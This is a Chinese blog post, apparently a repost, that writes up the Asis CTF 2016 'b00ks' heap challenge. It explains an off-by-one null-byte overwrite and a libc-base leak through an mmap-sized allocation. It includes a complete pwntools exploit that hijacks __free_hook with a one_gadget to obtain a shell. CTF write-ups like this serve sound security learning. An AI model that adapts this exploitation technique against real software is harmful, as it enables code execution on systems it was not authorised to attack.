Asis CTF 2016——b00ks

最新推荐文章于 2023-10-02 12:42:32 发布
最新推荐文章于 2023-10-02 12:42:32 发布
阅读量361 收藏
点赞数
原文链接:http://www.cnblogs.com/pfcode/p/10730551.html
版权

这程序是一个图书管理系统  #off-by-one

程序逻辑

 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3)
 2 {
 3   struct _IO_FILE *v3; // rdi
 4   __int64 savedregs; // [rsp+20h] [rbp+0h]
 5 
 6   setvbuf(stdout, 0LL, 2, 0LL);
 7   v3 = stdin;
 8   setvbuf(stdin, 0LL, 1, 0LL);
 9   hello();
10   input_name();
11   while ( (unsigned int)sub_A89(v3) != 6 )
12   {
13     switch ( (unsigned int)&savedregs )
14     {
15       case 1u:
16         create(v3);
17         break;
18       case 2u:
19         delete(v3);
20         break;
21       case 3u:
22         edit(v3);
23         break;
24       case 4u:
25         print(v3);
26         break;
27       case 5u:
28         input_name();
29         break;
30       default:
31         v3 = (struct _IO_FILE *)"Wrong option";
32         puts("Wrong option");
33         break;
34     }
35   }
36   puts("Thanks to use our library software");
37   return 0LL;
38 }

create后创建book结构体

 1 book = malloc(0x20uLL);
 2 if ( book )
 3 {
 4     *((_DWORD *)book + 6) = size;
 5     *((_QWORD *)off_202010 + v2) = book;
 6     *((_QWORD *)book + 2) = description;
 7     *((_QWORD *)book + 1) = name;
 8     *(_DWORD *)book = ++unk_202024;
 9     return 0LL;
10 }

 

1 stuct book{
2   int id;
3   char *name;
4   char *description;
5   int size;
6 }

author_name偏移:  0x202040

book结构体指针偏移:  0x202060

读取author_name的函数有off by one漏洞,读取32字节

最后的NULL字节可以覆盖掉第一个book结构体指针的最低字节

 1 signed __int64 __fastcall sub_9F5(_BYTE *a1, int a2)
 2 {
 3   int i; // [rsp+14h] [rbp-Ch]
 4   _BYTE *buf; // [rsp+18h] [rbp-8h]
 5 
 6   if ( a2 <= 0 )
 7     return 0LL;
 8   buf = a1;
 9   for ( i = 0; ; ++i )
10   {
11     if ( (unsigned int)read(0, buf, 1uLL) != 1 )
12       return 1LL;
13     if ( *buf == 10 )
14       break;
15     ++buf;
16     if ( i == a2 )
17       break;
18   }
19   *buf = 0; //最后加了一个\x00字节,造成off by one
20   return 0LL;
21 }

内存初始分布

1 0x555555756040: 0x6161616161616161  0x6161616161616161
2 0x555555756050: 0x6161616161616161  0x6161616161616161   <== author name
3 0x555555756060: 0x0000555555757480 <== pointer array    0x0000000000000000
4 0x555555756070: 0x0000000000000000  0x0000000000000000
5 0x555555756080: 0x0000000000000000  0x0000000000000000

NULL覆盖后

1 0x555555756040: 0x6161616161616161  0x6161616161616161
2 0x555555756050: 0x6161616161616161  0x6161616161616161   <== author name
3 0x555555756060: 0x0000555555757400 <== pointer array    0x0000000000000000
4 0x555555756070: 0x0000000000000000  0x0000000000000000
5 0x555555756080: 0x0000000000000000  0x0000000000000000

 

利用思路

为了实现泄漏,首先在 author_name 中需要输入 32 个字节来使得结束符被覆盖掉。之后我们创建 book1 ,这个 book1 的指针会覆盖 author name 中最后的 NULL 字节,使得该指针与 author name 直接连接,这样输出 author name 则可以获取到一个堆指针。

程序中同样提供了一种 change 功能, change 功能用于修改 author name ,所以通过 change 可以写入 author name ,利用 off-by-one 覆盖 pointer array 第一个项的低字节。

覆盖掉 book1 指针的低字节后,这个指针会指向 book1 的 description ,由于程序提供了 edit 功能可以任意修改 description 中的内容。我们可以提前在 description 中布置数据伪造成一个 book 结构,这个 book 结构的 description 和 name 指针可以由直接控制。

但是这个题目特殊之处在于开启 PIE 并且没有泄漏 libc 基地址的方法,因此我们还需要想一下其他的办法。

这道题的巧妙之处在于在分配第二个 book 时,使用一个很大的尺寸,使得堆以 mmap 模式进行拓展。我们知道堆有两种拓展方式一种是 brk 会直接拓展原来的堆,另一种是 mmap 会单独映射一块内存。

在这里我们申请一个超大的块,来使用 mmap 扩展内存。因为 mmap 分配的内存与 libc 之前存在固定的偏移因此可以推算出 libc 的基地址。(写个demo试验下,vmmap查看)


exploit

 

 1 from pwn import *
 2 context.log_level="info"
 3 
 4 binary = ELF("b00ks")
 5 libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
 6 io = process("./b00ks")
 7 
 8 
 9 def createbook(name_size, name, des_size, des):
10     io.readuntil("> ")
11     io.sendline("1")
12     io.readuntil(": ")
13     io.sendline(str(name_size))
14     io.readuntil(": ")
15     io.sendline(name)
16     io.readuntil(": ")
17     io.sendline(str(des_size))
18     io.readuntil(": ")
19     io.sendline(des)
20 
21 def printbook(id):
22     io.readuntil("> ")
23     io.sendline("4")
24     io.readuntil(": ")
25     for i in range(id):
26         book_id = int(io.readline()[:-1])
27         io.readuntil(": ")
28         book_name = io.readline()[:-1]
29         io.readuntil(": ")
30         book_des = io.readline()[:-1]
31         io.readuntil(": ")
32         book_author = io.readline()[:-1]
33     return book_id, book_name, book_des, book_author
34 
35 def createname(name):
36     io.readuntil("name: ")
37     io.sendline(name)
38 
39 def changename(name):
40     io.readuntil("> ")
41     io.sendline("5")
42     io.readuntil(": ")
43     io.sendline(name)
44 
45 def editbook(book_id, new_des):
46     io.readuntil("> ")
47     io.sendline("3")
48     io.readuntil(": ")
49     io.writeline(str(book_id))
50     io.readuntil(": ")
51     io.sendline(new_des)
52 
53 def deletebook(book_id):
54     io.readuntil("> ")
55     io.sendline("2")
56     io.readuntil(": ")
57     io.sendline(str(book_id))
58 
59 createname("A" * 32)
60 createbook(0xd0, "a", 0x40, "a")      #这里要计算一下,使pointer_to_book1最低字节被\x00覆盖后指向des
61 createbook(0x21000, "a", 0x21000, "b")
62 
63 book_id_1, book_name, book_des, book_author = printbook(1)
64 book1_addr = u64(book_author[32:32+6].ljust(8,'\x00'))
65 log.success("book1_address:" + hex(book1_addr))
66 
67 payload = p64(1) + p64(book1_addr + 0x38) + p64(book1_addr + 0x40) + p64(0xffff) #将book1_des伪造成book结构,name指向book2_name,des指向book2_des
68 editbook(book_id_1, payload) 
69 changename("A" * 32)    #pointer_to_book1=pointer_to_book1_des
70 
71 book_id_1, book_name, book_des, book_author = printbook(1) #print(book1_des),此时book1_des为伪造的book结构
72 book2_name_addr = u64(book_name.ljust(8,"\x00"))
73 book2_des_addr = u64(book_des.ljust(8,"\x00"))
74 log.success("book2 name addr:" + hex(book2_name_addr))
75 log.success("book2 des addr:" + hex(book2_des_addr))
76 libc_base = book2_name_addr - 0x5b0010            #固定偏移
77 log.success("libc base:" + hex(libc_base))
78 
79 free_hook = libc_base + libc.symbols["__free_hook"]
80 one_gadget = libc_base + 0x4526a # 0x4f2c5 0x10a38c 0x4f322
81 log.success("free_hook:" + hex(free_hook))
82 log.success("one_gadget:" + hex(one_gadget))
83 editbook(1, p64(free_hook) * 2)         #将book2 des修改为free_hook地址
84 editbook(2, p64(one_gadget))        #将free_hook处修改为one_gadget地址
85 
86 deletebook(2)  执行one_gadget
87 
88 io.interactive()

 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/off_by_one/#1-asis-ctf-2016-b00ks

转载于:https://www.cnblogs.com/pfcode/p/10730551.html

aaa15893831716
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 556
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
Asis CTF 2016 b00ks
Bill
04-01 2790
Asis CTF 2016 b00ks 1. 序言 &nbsp;&nbsp;本篇文章是对CTF WIKI Off-By-One漏洞类型的补充. CTF WIKI上面Off-By-One这一章节中两个例子均没有给出相应的EXP, 本次总结将其中一个例子详细分析一下, 希望能够对其他学习者有帮助 2. 程序简介 该程序是一个图书管理系统,可以添加书名,修改作者名以及写备注...
[PWN] BUUCTF asis2016_b00ks Offbynull利用
LDX的博客
10-02 153
堆 Offbyone 劫持free_hook
buu刷题日记 asis2016_b00ks
qq_51474381的博客
05-18 518
1.漏洞点 一个off by null,但和其他堆题的利用不太一样。 输入name时可覆盖heaplist的最低位为0 2.利用思路 1.泄露heap地址 申请大的heap再free掉,show功能正常,直接泄露。 2.泄露libc && 改__free_hook heaplist的第一个指针最低位可覆盖为0,在对应位置伪造结构体,再结合edit和show功能实现任意读写,改freehook为system。 3.shell 申请时写入‘/bin/sh\x00’再
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
最新发布
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
asis2完整版
03-21
asis2完整版】指的是Apache Axis2的完整版本,它是一个高效的、可扩展的Web服务(Web Service)引擎。Apache Axis2是Axis1的下一代产品,专注于提供高性能、灵活且模块化的Web服务解决方案。 Web服务是一种通过...
ASIS for GNAT-开源
05-15
ASIS 本身是 ISO / IEC 15291:1999 国际标准,确保了不同实现之间的兼容性,使得开发者可以编写一次工具,然后在遵循 ASIS 标准的不同 Ada 编译器上运行。这一标准的制定,极大地促进了 Ada 开发环境的生态系统发展...
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
ctf-writeups:CTF撰写
05-17
准备Docker容器为了毫无问题地运行挑战POC,我为各种Ubuntu版本准备了docker容器。 有关使用容器的说明,请参见。...32 NX Partial RELRO ASLR ret2libc stack overflow CTFtime Writeups档案ASIS
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 564
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
asis2016-b00ks
40KO的博客
06-02 728
off-by-one 本题主要是堆上面的off-by-one漏洞利用。off-by-one的成因主要是输入边界考虑不周导致的单字节溢出。一种利用方式是通过修改chunk大小造成结构块之间的重叠,本题就是这种利用方式。 程序分析 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 savedreg...
堆溢出off-by-one(asis-ctf-2016 pwn 之 b00ks)
九层台
08-01 2312
这些天积累也知道了一些关于glibc内存的分配策略。 说pwn 是在内存里捉迷藏其实到这里才真正接触大片的内存。精确控制就能保证精确修改数据。 需要的一个很重要的能力就是跟内存的能力。 这里调试exp用gdb.attach(p)来下断点,弹出调试界面。跟踪内存。 用gdb的x命令/xg参数来查看内存以十六进制8字节显示。 这个程序开启了PIE跟踪不太容易,不过可以用find命令查找输入的...
[Asis CTF 2016] b00ks
ethan18的博客
08-01 179
这道题主要是用到了Off-By-One漏洞,还有利用mmap成立的堆与libc基址间距相等的原理。
初探off-by-one之Asis CTF 2016 b00ks
Vicl1fe的博客
09-25 968
题目链接:ctf-wiki 参考链接:传送门 如果不懂,可以加讨论qq群:946220807 欢迎大佬坐阵 Off-by-one 单字节溢出,顾名思义,可溢出并且只溢出一个字节。具体还是看题吧。实践出真理。 代码分析 拿到题后,是一个图书管理系统,代码实现五个功能 功能: 创建一个图书 删除图书 编辑图书 打印图书内容 修改作者的名字。 程序刚开始,会让你输入作者的名字,可以看到这里调用了...
PWN学习之[Rookiss]-[echo1]
Magic1an的博客
08-19 1545
echo1是一个64位的elf可执行文件,用checksec检查发现基本没有进行保护措施Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: H
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1506
ciscn2022-线上-半决-pwn
第一次接触堆题--wp
Oops-re的博客
11-16 171
pwn初学堆off_by_one
2016-Asis-books_writeup
【xiaoxiaorenwu's blog】
04-07 413
wiki上的一道经典例题,写wp的目的一方面是wiki上一些细节讲的有点不太清楚,一方面是自己巩固一下做过的题目,看是否是真的掌握。 首先提供题目二级制文件链接:books 预览: 拿到题目先看基本信息: 可以看到题目是64位文件,所有保护全开,一般这种题目是堆题,且看到full relro则大概率是篡改malloc_hook。 然后运行一下,找到程序运行入口,然后放入ida里看反汇编码: 准...
ASIS+Quals
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值